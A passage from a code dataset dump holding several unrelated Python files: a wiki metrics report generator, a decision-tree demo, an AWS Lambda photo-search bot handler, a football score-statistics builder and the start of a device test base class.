\"\"\" || \"\"\" + \"{:.0%}\".format(b[2]) + \"\"\"\r\n\"\"\" \r\n if i == 4:\r\n Enrichment_Time_Table = Enrichment_Time_Table + \"\"\"\r\n|-\r\n| This month Last Year || \"\"\" + \"{0:.1f}\".format(b[1]) + \"\"\" || \"\"\" + \"{:.0%}\".format(b[2]) + \"\"\"\r\n\"\"\"\r\n if i == 5:\r\n Enrichment_Time_Table = Enrichment_Time_Table + \"\"\"\r\n|-\r\n| YTD || \"\"\" + \"{0:.1f}\".format(b[1]) + \"\"\" || \"\"\" + \"{:.0%}\".format(b[2]) + \"\"\"\r\n\"\"\"\r\n if i == 6:\r\n Enrichment_Time_Table = Enrichment_Time_Table + \"\"\"\r\n|-\r\n| Last Year || \"\"\" + \"{0:.1f}\".format(b[1]) + \"\"\" || \"\"\" + \"{:.0%}\".format(b[2]) + \"\"\" \r\n|}\r\n\"\"\"\r\n\r\n Yesterdays_Enrichment_Table = \"\"\"{| class=\"wikitable sortable\"\r\n! style=\"background: #7fffd4|Order Number !! style=\"background: #7fffd4|Item Number !! style=\"background: #7fffd4|ER Number !! style=\"background: #7fffd4|Order Entered !! style=\"background: #7fffd4|Order Reentered !! style=\"background: #7fffd4|Work Days\r\n\"\"\"\r\n \r\n for h in run_sql_statement('Yesterdays_Enrichment'):\r\n for c in range(6):\r\n if c == 0:\r\n Yesterdays_Enrichment_Table = Yesterdays_Enrichment_Table + \"\"\"\r\n|-\r\n| \"\"\" + str(h[c])\r\n \r\n elif c == 3 or c == 4:\r\n try:\r\n Yesterdays_Enrichment_Table = Yesterdays_Enrichment_Table + \"\"\"|| style=\"background: #ffffff| \"\"\"+ \"{:%d-%b-%y %H:%M %p}\".format(h[c]) # for a new column\r\n except:\r\n Yesterdays_Enrichment_Table = Yesterdays_Enrichment_Table + \"\"\"|| style=\"background: #ffffff| \"\"\"+ str(h[c]) # for a new column\r\n else:\r\n Yesterdays_Enrichment_Table = Yesterdays_Enrichment_Table + \"\"\"|| style=\"background: #ffffff| \"\"\"+ str(h[c]) # for a new column\r\n \r\n\r\n\r\n Yesterdays_Enrichment_Table = Yesterdays_Enrichment_Table + \"\"\"\r\n|}\"\"\"\r\n\r\n\r\n Shiment_History_Table = \"\"\"{| class=\"wikitable sortable\"\r\n! style=\"background: #7fffd4|Order Number !! Priority !! style=\"background: #7fffd4|Item Number !! style=\"background: #7fffd4|ER Number !! style=\"background: #7fffd4|Order Entered !! style=\"background: #7fffd4|Order Shipped !! style=\"background: #7fffd4|Work Days\r\n\"\"\"\r\n \r\n for h in run_sql_statement('Shipment_History'):\r\n for c in range(7):\r\n if c == 0:\r\n Shiment_History_Table = Shiment_History_Table + \"\"\"\r\n|-\r\n| \"\"\" + str(h[c])\r\n \r\n elif c == 3 or c == 4:\r\n try:\r\n Shiment_History_Table = Shiment_History_Table + \"\"\"|| style=\"background: #ffffff| \"\"\"+ \"{:%d-%b-%y %H:%M %p}\".format(h[c]) # for a new column\r\n except:\r\n Shiment_History_Table = Shiment_History_Table + \"\"\"|| style=\"background: #ffffff| \"\"\"+ str(h[c]) # for a new column\r\n else:\r\n Shiment_History_Table = Shiment_History_Table + \"\"\"|| style=\"background: #ffffff| \"\"\"+ str(h[c]) # for a new column\r\n \r\n\r\n\r\n Shiment_History_Table = Shiment_History_Table + \"\"\"\r\n|}\"\"\"\r\n\r\n\r\n\r\n\r\n \r\n article = \"\"\"\r\n== Enrichment Time ==\r\n\r\nTurnaround goal is 5 days or under 95% of the time.\r\n\r\n\"\"\" + Enrichment_Time_Table + \"\"\"\r\n== Yesterday's Enrichment ==\r\n\r\n\"\"\" + Yesterdays_Enrichment_Table + \"\"\"\r\n\r\n\r\n== Shipping Pirority Metric ==\r\n\r\nfile:shipments.jpg|Priority Breakdown\r\nfile:agile.jpg|Agile Order Level\r\nFile:total duration.png|Total Durations\r\nFile:Monthly performance.jpg|Monthly FTS Performance\r\nfile:shipdist.jpg|Shipping Duration Distribution (all)\r\nfile:monthshipdist.jpg|Shipping Duration Distribution (month)\r\nfile:sc.png|SC Performance\r\nfile:ftp eng.png|Eng Performance\r\nfile:ftp eng monthly.png|Eng Performance Month\r\nfile:ftp prod.png|Production Performance\r\n\r\n\r\n\r\n\r\n== Shipment History ==\r\n\r\n\"\"\" + Shiment_History_Table + \"\"\"\r\n\r\n

\r\n\r\n\r\n\r\n\r\nPrevious\r\nNext\r\n\r\n\r\n[[category:Automated Reports]][[category:Enrichment]][[category:Engineering]]\r\n \"\"\" \r\n update_wiki_page(article)\r\n\r\nif __name__ == \"__main__\":\r\n main()","sub_path":"Enrichment_Report.py","file_name":"Enrichment_Report.py","file_ext":"py","file_size_in_byte":6557,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"0"} +{"seq_id":"554963720","text":"from CreateDT.ID3 import createID3Tree\nfrom CreateDT.C4_5 import createC4_5Tree\nfrom CreateDT.CART import createCARTTree\nfrom CreateDT.PlotDT import createPlot\nimport matplotlib.pyplot as plt\n\n# 读取数据集文件\ndef loadDataSet(fileName):\n \"\"\"\n :param fileName:数据集文件\n :return:数据集\n \"\"\"\n file = open(fileName) # 打开数据集文件\n line = file.readline() # 读取每行所有元素\n dataSet = [] # 数据集初始化\n while line:\n data = line.strip('\\n').split(',') # 按照','划分数据,并剔除回车符\n dataSet.append(data) # 将每行数据放到数据集\n line = file.readline()\n file.close()\n return dataSet\n\n# 构造原始数据集和属性集合\noriginalDataSet = loadDataSet('DataSet/watermelon.txt')\nlabels = originalDataSet[0]\ndataSet = originalDataSet[1:]\n\ndef showDT(dataSet, labels):\n \"\"\"\n :param dataSet:数据集\n :param labels:属性标签\n \"\"\"\n\n # ID3算法生成分类决策树\n ID3Tree = createID3Tree(list(dataSet), list(labels))\n print('The ID3 Decision Tree is', ID3Tree)\n\n # C4.5算法生成分类决策树\n C4_5Tree = createC4_5Tree(list(dataSet), list(labels))\n print('The C4.5 Decision Tree is', C4_5Tree)\n\n # CART算法生成分类决策树\n CARTTree = createCARTTree(list(dataSet), list(labels))\n print('The CART Decision Tree is', CARTTree)\n\n # 显示各个决策树\n createPlot(ID3Tree, 'ID3 Decision Tree')\n createPlot(C4_5Tree, 'C4.5 Decision Tree')\n createPlot(CARTTree, 'CART Decision Tree')\n plt.show() # 显示决策树\n\nshowDT(dataSet, labels)\n","sub_path":"test1.py","file_name":"test1.py","file_ext":"py","file_size_in_byte":1694,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"0"} +{"seq_id":"573145710","text":"import math\nimport dateutil.parser\nimport os\nimport time\nimport logging\nimport boto3\nimport json\n\nimport requests\nfrom requests_aws4auth import AWS4Auth\n\n\nregion = 'us-east-1' # e.g. us-east-1\nservice = 'es'\ncredentials = boto3.Session().get_credentials()\nawsauth = AWS4Auth(credentials.access_key, credentials.secret_key, region, service, session_token=credentials.token)\n\nhost = 'https://search-photo-storage-3gex4uqz77gf2abn5bvis25ilm.us-east-1.es.amazonaws.com' # the Amazon ES domain, with https://\nindex = 'photos'\ntype = '_search'\nurl = host + '/' + index + '/' + type + '/'\n\nheaders = { \"Content-Type\": \"application/json\" }\n\nlogger = logging.getLogger()\nlogger.setLevel(logging.DEBUG)\n\n\n\"\"\" --- Helpers to build responses which match the structure of the necessary dialog actions --- \"\"\"\n\n\ndef get_slots(intent_request):\n return intent_request['currentIntent']['slots']\n\n\ndef elicit_slot(session_attributes, intent_name, slots, slot_to_elicit, message):\n return {\n 'sessionAttributes': session_attributes,\n 'dialogAction': {\n 'type': 'ElicitSlot',\n 'intentName': intent_name,\n 'slots': slots,\n 'slotToElicit': slot_to_elicit,\n 'message': message\n }\n }\n\n\ndef close(session_attributes, fulfillment_state, message):\n response = {\n 'sessionAttributes': session_attributes,\n 'dialogAction': {\n 'type': 'Close',\n 'fulfillmentState': fulfillment_state,\n 'message': message\n }\n }\n\n return response\n\n\ndef delegate(session_attributes, slots):\n return {\n 'sessionAttributes': session_attributes,\n 'dialogAction': {\n 'type': 'Delegate',\n 'slots': slots\n }\n }\n\n\n\"\"\" --- Helper Functions --- \"\"\"\n\n\ndef parse_int(n):\n try:\n return int(n)\n except Exception:\n return False\n\n\ndef build_validation_result(is_valid, violated_slot, message_content):\n if message_content is None:\n return {\n \"isValid\": is_valid,\n \"violatedSlot\": violated_slot,\n }\n\n return {\n 'isValid': is_valid,\n 'violatedSlot': violated_slot,\n 'message': {'contentType': 'PlainText', 'content': message_content}\n }\n\n\ndef isvalid_date(date):\n try:\n dateutil.parser.parse(date)\n return True\n except ValueError:\n return False\n\n\ndef validate_searchkey(keyword_1,keyword_2):\n keywords = ['tree', 'person', 'dog', 'glass','milk','coffee cup', 'cup', 'alcohol','human','finger','face', 'wine glass', 'goblet']\n if keyword_1 is not None and keyword_1.lower() not in keywords:\n return build_validation_result(False,\n 'searchkeyone',\n 'Sorry, we only have {}, would you like a different type of photo? '.format(keywords))\n\n if keyword_2 is not None and keyword_2.lower() not in keywords:\n \n return build_validation_result(False,\n 'searchkeytwo',\n 'Sorry, we only have {}, would you like a different type of photo? '.format(keywords))\n\n return build_validation_result(True, None, None)\n\n\n\"\"\" --- Functions that control the bot's behavior --- \"\"\"\n \n \n\n\ndef search_intent(intent_request):\n \"\"\"\n Performs dialog management and fulfillment for ordering flowers.\n Beyond fulfillment, the implementation of this intent demonstrates the use of the elicitSlot dialog action\n in slot validation and re-prompting.\n \"\"\"\n \n keyword_1 = get_slots(intent_request)[\"searchkeyone\"]\n keyword_2 = get_slots(intent_request)[\"searchkeytwo\"]\n source = intent_request['invocationSource']\n\n if source == 'DialogCodeHook':\n # Perform basic validation on the supplied input slots.\n # Use the elicitSlot dialog action to re-prompt for the first violation detected.\n slots = get_slots(intent_request)\n\n validation_result = validate_searchkey(keyword_1,keyword_2)\n if not validation_result['isValid']:\n slots[validation_result['violatedSlot']] = None\n return elicit_slot(intent_request['sessionAttributes'],\n intent_request['currentIntent']['name'],\n slots,\n validation_result['violatedSlot'],\n validation_result['message'])\n\n # Pass the price of the flowers back through session attributes to be used in various prompts defined\n # on the bot model.\n \n output_session_attributes = intent_request['sessionAttributes'] if intent_request['sessionAttributes'] is not None else {}\n\n\n return delegate(output_session_attributes, get_slots(intent_request))\n\n # Order the flowers, and rely on the goodbye message of the bot to define the message to the end user.\n # In a real bot, this would likely involve a call to a backend service.\n \n # sqs = boto3.resource('sqs')\n\n # queue = sqs.get_queue_by_name(QueueName='restaurants_request')\n # msg = {\"location\":location, \"cuisine\": cuisine,\"numberofpeople\":num_people, \"phone\": phone}\n # response = queue.send_message(MessageBody=json.dumps(msg))\n # print(response)\n \n print(keyword_1)\n print(keyword_2)\n print('start searching')\n \n if keyword_2 is not None:\n query ={\n \"query\":{\n \"bool\":{\n \"must\":[\n {\"term\": {\"labels\": keyword_1}},\n {\"term\": {\"labels\": keyword_2}}]\n }\n },\n \"size\": 1000 #number of rows you want to get in the result\n }\n else:\n query ={\n \"query\":{\n \"match\": {\n \"labels\" : keyword_1\n }\n },\n \"size\": 1000 #number of rows you want to get in the result\n }\n \n r = requests.get(url, auth=awsauth, json=query, headers=headers)\n\n results = json.loads(r.text)\n print(results)\n \n ## to do\n n_hits = int(results['hits']['total']['value'])\n print(n_hits)\n \n photo_object = ''\n \n if(len(results['hits']['hits'])==0):\n print(\"No matching photo Found\")\n return close(intent_request['sessionAttributes'],\n 'Fulfilled',\n {'contentType': 'PlainText',\n 'content': 'None'}) \n else:\n for hit in results['hits']['hits']: #loop the data\n photo_object +=(hit['_source']['objectKey'])\n photo_object += ' '\n print(\"photo Data\\n\",hit)\n # use hit['_source'][''] to retreive the required feild data from your lambda\n #print(\"User Name-->\",hit['_source']['id']) \n\n\n #return photo index to frontend\n print(photo_object)\n #return photo_idx\n return close(intent_request['sessionAttributes'],\n 'Fulfilled',\n {'contentType': 'PlainText',\n 'content': photo_object\n })\n\n\n\"\"\" --- Intents --- \"\"\"\n\n\ndef dispatch(intent_request):\n \"\"\"\n Called when the user specifies an intent for this bot.\n \"\"\"\n\n logger.debug('dispatch userId={}, intentName={}'.format(intent_request['userId'], intent_request['currentIntent']['name']))\n\n intent_name = intent_request['currentIntent']['name']\n\n # Dispatch to your bot's intent handlers\n if intent_name == 'SearchIntent':\n return search_intent(intent_request)\n\n raise Exception('Intent with name ' + intent_name + ' not supported')\n\n\n\"\"\" --- Main handler --- \"\"\"\n\n\ndef lambda_handler(event, context):\n \"\"\"\n Route the incoming request based on intent.\n The JSON body of the request is provided in the event slot.\n \"\"\"\n # By default, treat the user request as coming from the America/New_York time zone.\n os.environ['TZ'] = 'America/New_York'\n time.tzset()\n logger.debug('event.bot.name={}'.format(event['bot']['name']))\n \n \n \n print('event is following:')\n print(event)\n\n return dispatch(event)\n\n\n\n","sub_path":"src/search_photos/search_photos.py","file_name":"search_photos.py","file_ext":"py","file_size_in_byte":8170,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"0"} +{"seq_id":"566480697","text":"import csv\nimport itertools\n\n# Load data from\ndef load_data(from_file, from_year, to_year):\n # Recupere les matches des dernières saisons\n matches = []\n with open(from_file, 'r', newline='') as csvfile:\n reader = csv.DictReader(csvfile, delimiter=',')\n for r in reader:\n season = int(r['Season'])\n if season not in range(from_year, to_year):\n continue\n row = {}\n for f in ['Date', 'HomeTeam', 'AwayTeam', 'Country', 'League']:\n row[f] = r[f].strip()\n skip = False\n for f in ['FTHG', 'FTAG', 'Season']:\n try:\n row[f] = int(r[f])\n except:\n skip = True\n if not skip:\n matches.append(row)\n\n # Trouve toutes les équipes\n teams = set(r['HomeTeam'] for r in matches) | set(r['AwayTeam'] for r in matches)\n # Liste complète des matches, chaque match apparaisant deux fois, une par équipe,\n # Determine le nombre de matches joués par équipe\n match_list = [r['HomeTeam'] for r in matches] + [r['AwayTeam'] for r in matches]\n teams_count = { t: match_list.count(t) for t in teams}\n total_match = len(match_list)\n # Plus petit et plus grand\n max_score = max(max(r['FTHG'], r['FTAG']) for r in matches)\n min_score = min(min(r['FTHG'], r['FTAG']) for r in matches)\n return matches, total_match, teams, teams_count, min_score, max_score\n\n## Va chercher à séparer les équipes en groupes de meilleurs attaquants et défenseur\ndef split_teams_into_groups(matches, teams, n_cat):\n\n # On crée le meilleur groupe à la main. De niveau n_cat-1\n best_group = set([\"Lyon\", \"Monaco\", \"Paris SG\"])\n best_group = set()\n adjusted_teams = teams - best_group\n\n\n # Les matchs joués par équipe\n played = {t : [] for t in adjusted_teams}\n for r in matches:\n if r['HomeTeam'] in adjusted_teams:\n played[r['HomeTeam']].append(r)\n if r['AwayTeam'] in adjusted_teams:\n played[r['AwayTeam']].append(r)\n # Goals matked and received per team\n goal_marked = {t:0 for t in adjusted_teams}\n goal_received = {t:0 for t in adjusted_teams}\n for r in matches:\n if r['HomeTeam'] in adjusted_teams:\n goal_marked[r['HomeTeam']] += r['FTHG']\n goal_received[r['HomeTeam']] += r['FTAG']\n if r['AwayTeam'] in adjusted_teams:\n goal_marked[r['AwayTeam']] += r['FTAG']\n goal_received[r['AwayTeam']] += r['FTHG']\n # Average using the number of matches playes by a team\n # Nombre de buts moyens données ou recus. Les équipes sont classées par ordre de force croissante\n for t in adjusted_teams:\n goal_marked[t] /= len(played[t])\n goal_received[t] /= len(played[t])\n\n goal_marked_ordered = sorted(goal_marked.items(), key=lambda x:x[1], reverse=False)\n goal_received_ordered = sorted(goal_received.items(), key=lambda x:x[1], reverse=True)\n #print(goal_marked_ordered)\n #print(goal_received_ordered)\n\n # La répartition par groupe se fait de telle sorte que le nombre de matchs joués par groupe soit équivalent\n # sinon, à cause du bas de tableau changeant, on a une mauvaise répartition\n\n # OLD : grpoupes de même taille\n #group_size_old = len(goal_marked_ordered) / n_cat\n #attack_group_old = {t: int(i / group_size_old) for i,(t,_) in enumerate(goal_marked_ordered)}\n #defense_group_old = {t: int(i / group_size_old) for i,(t,_) in enumerate(goal_received_ordered)}\n\n total_match = sum(len(played[t]) for t in adjusted_teams)\n group_size = total_match / (n_cat - (1 if len(best_group) > 0 else 0)) # car j'ai séparé le groupe de tête à la main\n goal_marked_match = [len(played[t]) for t,_ in goal_marked_ordered]\n goal_marked_match = list(itertools.accumulate(goal_marked_match))\n goal_marked_match = [int(g / group_size) for g in goal_marked_match]\n attack_group = {t: min(g, n_cat - 1 - (1 if len(best_group) > 0 else 0)) for (t, _), g in zip(goal_marked_ordered, goal_marked_match)}\n #print(attack_group)\n\n goal_received_match = [len(played[t]) for t,_ in goal_received_ordered]\n goal_received_match = list(itertools.accumulate(goal_received_match))\n goal_received_match = [ int(g / group_size) for g in goal_received_match]\n defense_group = {t: min(g, n_cat - 1 - (1 if len(best_group) > 0 else 0)) for (t, _), g in zip(goal_received_ordered, goal_received_match)}\n #print(defense_group)\n\n # ajout du groupe de tête\n for t in best_group:\n defense_group[t] = n_cat - 1\n attack_group[t] = n_cat - 1\n return attack_group, defense_group\n\ndef compute_base_statistics(matches, attack_group, defense_group, min_score, max_score, n_cat):\n # Regroupement des scores par classes d'attaque\n base_statistics = {} # dictionnaire indexé par (Aa, Ad, Ba, Bd, s1, s2)\n base_2 = {} # dictionnaire indexé par (Aa, Ad, Ba, Bd} = { 's': {(s1,s2):nbre de buts, 'p':(s1,s2):proba, 'l':# échantillons)\n\n # initialise base_2\n ra = range(n_cat)\n sca = range(min_score, max_score + 1)\n for Aa, Ad, Ba, Bd in itertools.product(ra, ra, ra, ra):\n base_2[(Aa, Ad, Ba, Bd)] = {'s': [[0 for _ in list(sca)] for _ in list(sca)], 'l': 0}\n\n for r in matches:\n Aa = attack_group[r['HomeTeam']]\n Ad = defense_group[r['HomeTeam']]\n Ba = attack_group[r['AwayTeam']]\n Bd = defense_group[r['AwayTeam']]\n s1 = r['FTHG']\n s2 = r['FTAG']\n k = (Aa, Ad, Ba, Bd, s1, s2)\n if k not in base_statistics:\n base_statistics[k] = 0\n base_statistics[k] += 1\n base_2[(Aa, Ad, Ba, Bd)]['l'] += 1\n base_2[(Aa, Ad, Ba, Bd)]['s'][s1][s2] += 1\n\n base_statistics = {k: v / len(matches) for k, v in base_statistics.items()}\n for Aa, Ad, Ba, Bd in itertools.product(ra, ra, ra, ra):\n n = base_2[(Aa, Ad, Ba, Bd)]['l']\n if n > 0:\n base_2[(Aa, Ad, Ba, Bd)]['p'] = [[base_2[(Aa, Ad, Ba, Bd)]['s'][i][j] / n for j in list(sca)] for i in list(sca)]\n\n return base_statistics, base_2\n\ndef write_matrices_to_file(rebuilt_matrices, to_file):\n if to_file is not '':\n with open(to_file, 'w', newline='') as csvfile:\n writer = csv.DictWriter(csvfile, delimiter=',', fieldnames=['Aa', 'Ad', 'Ba', 'Bd', 'l', 's1', 's2', 'p'])\n writer.writeheader()\n for (Aa, Ad, Ba, Bd), r in rebuilt_matrices.items():\n if 'p' not in r:\n continue\n p = r['p']\n l = r['l']\n for s1, row in enumerate(p):\n for s2, probability in enumerate(row):\n w_r = {'Aa': Aa, 'Ad':Ad, 'Ba':Ba, 'Bd':Bd, 'l':l, 's1':s1, 's2':s2, 'p':probability}\n writer.writerow(w_r)\n\ndef write_matrices_flat_to_file(rebuilt_matrices, to_file):\n if to_file is not '':\n with open(to_file, 'w', newline='') as csvfile:\n first = False\n fieldnames = ['Aa', 'Ad', 'Ba', 'Bd', 'l']\n for (Aa, Ad, Ba, Bd), r in rebuilt_matrices.items():\n if 'pgd' not in r or 'ptg' not in r:\n continue\n pg = r['pgd']\n tg = r['ptg']\n l = r['l']\n if not first:\n for k in pg:\n fieldnames.append(\"GD_{}\".format(k))\n for k in tg:\n fieldnames.append(\"TG_{}\".format(k))\n writer = csv.DictWriter(csvfile, delimiter=',',fieldnames=fieldnames)\n writer.writeheader()\n first = True\n w_r = {'Aa': Aa, 'Ad': Ad, 'Ba': Ba, 'Bd': Bd, 'l': l}\n for k, probability in pg.items():\n w_r[\"GD_{}\".format(k)] = probability\n for k, probability in tg.items():\n w_r[\"TG_{}\".format(k)] = probability\n writer.writerow(w_r)\n\ndef split_teams_by_seasons_into_groups(matches, teams, n_cat):\n\n # On crée le meilleur groupe à la main. De niveau n_cat-1\n # Les matchs joués par équipe\n played = {}\n for r in matches:\n season = r['Season']\n ht = \"{}_{}\".format(r['HomeTeam'], season)\n if ht not in played:\n played[ht] = [r]\n else:\n played[ht].append(r)\n at = \"{}_{}\".format(r['AwayTeam'], season)\n if at not in played:\n played[at] = [r]\n else:\n played[at].append(r)\n\n adjusted_teams = list(played.keys())\n # Goals matked and received per team\n goal_marked = {t:0 for t in adjusted_teams}\n goal_received = {t:0 for t in adjusted_teams}\n for r in matches:\n season = r['Season']\n ht = \"{}_{}\".format(r['HomeTeam'], season)\n at = \"{}_{}\".format(r['AwayTeam'], season)\n goal_marked[ht] += r['FTHG']\n goal_received[ht] += r['FTAG']\n goal_marked[at] += r['FTAG']\n goal_received[at] += r['FTHG']\n # Average using the number of matches playes by a team\n # Nombre de buts moyens données ou recus. Les équipes sont classées par ordre de force croissante\n for t in adjusted_teams:\n goal_marked[t] /= len(played[t])\n goal_received[t] /= len(played[t])\n\n goal_marked_ordered = sorted(goal_marked.items(), key=lambda x:x[1], reverse=False)\n goal_received_ordered = sorted(goal_received.items(), key=lambda x:x[1], reverse=True)\n #print(goal_marked_ordered)\n #print(goal_received_ordered)\n\n # groupes de même taille\n group_size = len(goal_marked_ordered) / n_cat\n attack_group = {t: int(i / group_size) for i,(t,_) in enumerate(goal_marked_ordered)}\n defense_group = {t: int(i / group_size) for i,(t,_) in enumerate(goal_received_ordered)}\n\n return attack_group, defense_group\n\n# distance entre deux Aa, Ad, Ba, Bd\ndef dist_v(a, b):\n Aa, Ad, Ba, Bd = a\n Aa_, Ad_, Ba_, Bd_ = b\n return abs(Aa - Aa_) + abs(Ad - Ad_) + abs(Ba - Ba_) + abs(Bd - Bd_)\n\n# Construit les stats manquantes\ndef build_matrices_rebuilt(stats, threshold_1, threshold_2, filter_threshold):\n stats_rebuilt = {}\n flat = [(k, r['pgd'],r['ptg'], r['l']) for k, r in stats.items() if r['l'] > 0]\n #data_full = sorted([(k, p, l) for k, p, l in flat if l > 0], key=lambda x: x[2], reverse=True)\n for k, r in list(stats.items()):\n if r['l'] >= threshold_1:\n stats_rebuilt[k] = r\n continue\n # ordonne les vecteurs proches par distance croissante\n closest = sorted([(kc, rc['l'], dist_v(k, kc)) for kc, rc in stats.items() if rc['l'] > filter_threshold], key=lambda x:x[2])\n closest_l = list(itertools.takewhile(lambda x: x < threshold_2, itertools.accumulate(l for _, l, _ in closest)))\n closest = closest[:len(closest_l) + 1]\n new_matrix_pg = {k:0 for k,_ in r['gd'].items()}\n new_matrix_tg = {k:0 for k,_ in r['tg'].items()}\n t = 0\n for kc, l, d in closest:\n f = l / (1+d)\n t += f\n new_matrix_pg = {k:x + f * stats[kc]['pgd'][k] for k, x in new_matrix_pg.items()}\n new_matrix_tg = {k:x + f * stats[kc]['ptg'][k] for k, x in new_matrix_tg.items()}\n #t = sum(l for _, l ,_ in closest)\n new_matrix_pg = {k:x / t for k,x in new_matrix_pg.items()}\n new_matrix_tg = {k:x / t for k,x in new_matrix_tg.items()}\n stats_rebuilt[k] = {\n 'pgd': new_matrix_pg,\n 'ptg': new_matrix_tg,\n 'l': sum(l for _, l ,_ in closest)\n }\n return stats_rebuilt\n\n\ndef compute_1N2_statistics(matches, attack_group, defense_group, min_score, max_score, n_cat):\n # Regroupement des scores par classes d'attaque\n base_statistics = {} # dictionnaire indexé par (Aa, Ad, Ba, Bd, s1, s2)\n s_stats = {} # dictionnaire indexé par (Aa, Ad, Ba, Bd} = { 's': {(s1,s2):nbre de buts, 'p':(s1,s2):proba, 'l':# échantillons)\n\n # initialise base_2\n ra = range(n_cat)\n #sca = range(min_score, max_score + 1)\n sca = range(3) # 0-2, 3-5, 6+ (divise par 3)\n for Aa, Ad, Ba, Bd in itertools.product(ra, ra, ra, ra):\n s_stats[(Aa, Ad, Ba, Bd)] = {'s': [[0, 0, 0] for _ in list(sca)], 'l': 0}\n\n for r in matches:\n season = r['Season']\n ht = \"{}_{}\".format(r['HomeTeam'], season)\n at = \"{}_{}\".format(r['AwayTeam'], season)\n Aa = attack_group[ht]\n Ad = defense_group[ht]\n Ba = attack_group[at]\n Bd = defense_group[at]\n s1 = r['FTHG']\n s2 = r['FTAG']\n k = (Aa, Ad, Ba, Bd, s1, s2)\n if k not in base_statistics:\n base_statistics[k] = 0\n base_statistics[k] += 1\n gd = 1 if s1 > s2 else (-1 if s1 < s2 else 0)\n tg = min((s1 + s2) // 3, 2)\n s_stats[(Aa, Ad, Ba, Bd)]['l'] += 1\n s_stats[(Aa, Ad, Ba, Bd)]['s'][tg][gd + 1] += 1\n\n base_statistics = {k: v / len(matches) for k, v in base_statistics.items()}\n for Aa, Ad, Ba, Bd in itertools.product(ra, ra, ra, ra):\n n = s_stats[(Aa, Ad, Ba, Bd)]['l']\n if n > 0:\n s_stats[(Aa, Ad, Ba, Bd)]['p'] = [[s_stats[(Aa, Ad, Ba, Bd)]['s'][i][j] / n for j in range(3)] for i in list(sca)]\n\n return s_stats\n\n\ndef compute_simple_statistics(matches, attack_group, defense_group, min_score, max_score, n_cat):\n # Regroupement des scores par classes d'attaque\n results = {} # dictionnaire indexé par (Aa, Ad, Ba, Bd} = { 'gd': {(gd):nbre de buts de différecence, 'pgd':proba, 'l':# échantillons)\n\n # initialise base_2\n gd_range = range(-2, 3)\n tg_range = range(4)\n ra = range(n_cat)\n sca = range(min_score, max_score + 1)\n for Aa, Ad, Ba, Bd in itertools.product(ra, ra, ra, ra):\n results[(Aa, Ad, Ba, Bd)] = {\n 'gd': {i:0 for i in list(gd_range)},\n 'l': 0,\n 'tg': {i: 0 for i in list(tg_range)}\n }\n\n for r in matches:\n season = r['Season']\n ht = \"{}_{}\".format(r['HomeTeam'], season)\n at = \"{}_{}\".format(r['AwayTeam'], season)\n Aa = attack_group[ht]\n Ad = defense_group[ht]\n Ba = attack_group[at]\n Bd = defense_group[at]\n s1 = r['FTHG']\n s2 = r['FTAG']\n results[(Aa, Ad, Ba, Bd)]['l'] += 1\n gd = s1 - s2\n gd = max(-2, gd)\n gd = min(2, gd) # gd compris entre -2 et 2\n tg = min((s1 + s2) // 2, 3) # Nombre de couples de buts, 0-1, 2-3, 4-5, 6-7 ou plus\n results[(Aa, Ad, Ba, Bd)]['gd'][gd] += 1\n results[(Aa, Ad, Ba, Bd)]['tg'][tg] += 1\n\n for Aa, Ad, Ba, Bd in itertools.product(ra, ra, ra, ra):\n n = results[(Aa, Ad, Ba, Bd)]['l']\n if n > 0:\n results[(Aa, Ad, Ba, Bd)]['pgd'] = {i:results[(Aa, Ad, Ba, Bd)]['gd'][i] / n for i in list(gd_range)}\n results[(Aa, Ad, Ba, Bd)]['ptg'] = {i: results[(Aa, Ad, Ba, Bd)]['tg'][i] / n for i in list(tg_range)}\n return results\n\n\n# =================================================================================================\n## Load data from files, identify teams and number of matches per team\ndef load_compute_matrices(from_year, to_year, threshold_1, threshold_2, filter_threshold, n_cat, from_file):\n matches, total_match, teams, teams_count, min_score, max_score = load_data(from_file, from_year, to_year)\n\n ## Séparer les équipes en groupes de meilleurs attaquants et défenseur\n attack_group, defense_group = split_teams_by_seasons_into_groups(matches, teams, n_cat)\n\n # Première approche : cumuler par Aa,Ad, Ba,Bd,s1,s2\n #_, base_2 = compute_base_statistics(matches, attack_group, defense_group, min_score, max_score, n_cat)\n #s_stats = compute_simple_statistics(matches, attack_group, defense_group, min_score, max_score, n_cat)\n s_stats = compute_1N2_statistics(matches, attack_group, defense_group, min_score, max_score, n_cat)\n\n filtered = {k:v for k, v in s_stats.items() if v['l'] > filter_threshold}\n\n rebuilt = build_matrices_rebuilt(s_stats, threshold_1, threshold_2, filter_threshold)\n\n return s_stats, rebuilt, filtered\n\nif __name__ == \"__main__\":\n n_cat = 4\n stats, rebuilt, filtered = load_compute_matrices(\n 1900, 2020,\n threshold_1=100,\n threshold_2=200,\n filter_threshold=100,\n n_cat=n_cat,\n from_file='paris_sportifs_filtered.csv'\n )\n write_matrices_flat_to_file(stats, 'matrices_flat_cat{}.csv'.format(n_cat))\n write_matrices_flat_to_file(rebuilt, 'matrices_flat_rebuilt_cat{}.csv'.format(n_cat))\n write_matrices_flat_to_file(filtered, 'matrices_flat_filtered_cat{}.csv'.format(n_cat))\n","sub_path":"build_1N2_from_history.py","file_name":"build_1N2_from_history.py","file_ext":"py","file_size_in_byte":16642,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"0"} +{"seq_id":"519648700","text":"import unittest\r\nimport os\r\nfrom sdc11073.wsdiscovery import WSDiscoverySingleAdapter\r\nfrom sdc11073 import pmtypes\r\nfrom sdc11073.location import SdcLocation\r\nfrom sdc11073.sdcclient import SdcClient\r\nfrom tests.mockstuff import SomeDevice\r\n\r\nloopback_adapter = 'Loopback Pseudo-Interface 1' if os.name == 'nt' else 'lo'\r\n\"\"\"\r\nBase test to use in all test that require device or a client. This sets up a default device and client\r\nand has connect method.\r\n\"\"\"\r\n\r\nclass BaseTest(unittest.TestCase):\r\n\r\n def setUp(self):\r\n self.wsdiscovery = WSDiscoverySingleAdapter(loopback_adapter)\r\n self.wsdiscovery.start()\r\n self._locValidators = [pmtypes.InstanceIdentifier('Validator', extensionString='System')]\r\n\r\n def tearDown(self):\r\n self.wsdiscovery.stop()\r\n\r\n def setUpCocoDraft10(self):\r\n self.cocoFinalLocation = SdcLocation(fac='tklx', poc='CU1', bed='cocoDraft10Bed')\r\n\r\n self.sdcDeviceCoCoFinal = SomeDevice.fromMdibFile(self.wsdiscovery, None, '70041_MDIB_Final.xml')\r\n 